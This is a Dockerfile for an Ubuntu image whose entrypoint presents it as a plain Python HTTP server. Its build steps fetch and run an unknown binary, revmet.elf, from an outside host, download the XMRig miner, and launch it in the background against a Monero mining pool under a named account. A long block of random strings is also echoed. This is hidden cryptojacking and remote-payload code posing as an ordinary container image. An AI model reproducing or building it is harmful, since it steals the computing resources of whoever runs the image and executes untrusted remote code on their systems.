FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo SMxQRgJrUJx5ruEGtNkOMuifbn9FvU9j CPtsxx7914KrmDaz6Wzw7b7VkxxQ3xBh PSWxwfV44C6pBTBrLagivKcqK3AE9RuK igT0Qxs9tbyPb39NEBbnhUBL7KNPFzf0 JutIu7xewskkIdIHnIn3rhXmIIpSoWyE i4yHKMr4QdMb0809NluYc6Qh27jonMZ4 QUsIieKQjsfaDiVcQdJNs0W9ssRHQKcc XF4fqC127Im8j2B4JxERHn9Cg5Rp6iDY be3Z8waCgEruaxYxEOV3srcfuf5IgOHn BrEq8AZDzDF53i4znpOnGt0RpVfbnF4R 2UFP27cJejT5hy7eHpqlp7zaQ4OeZmnK QHjVadt4YSAfFu7kI7tpZ5otcs2yMqVq wZejzHq2nO5UMdYV8OK7cqlPoLxYVaLO A1VPmBIBAYfvmanGBX29kfNoo6cLfOjC DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]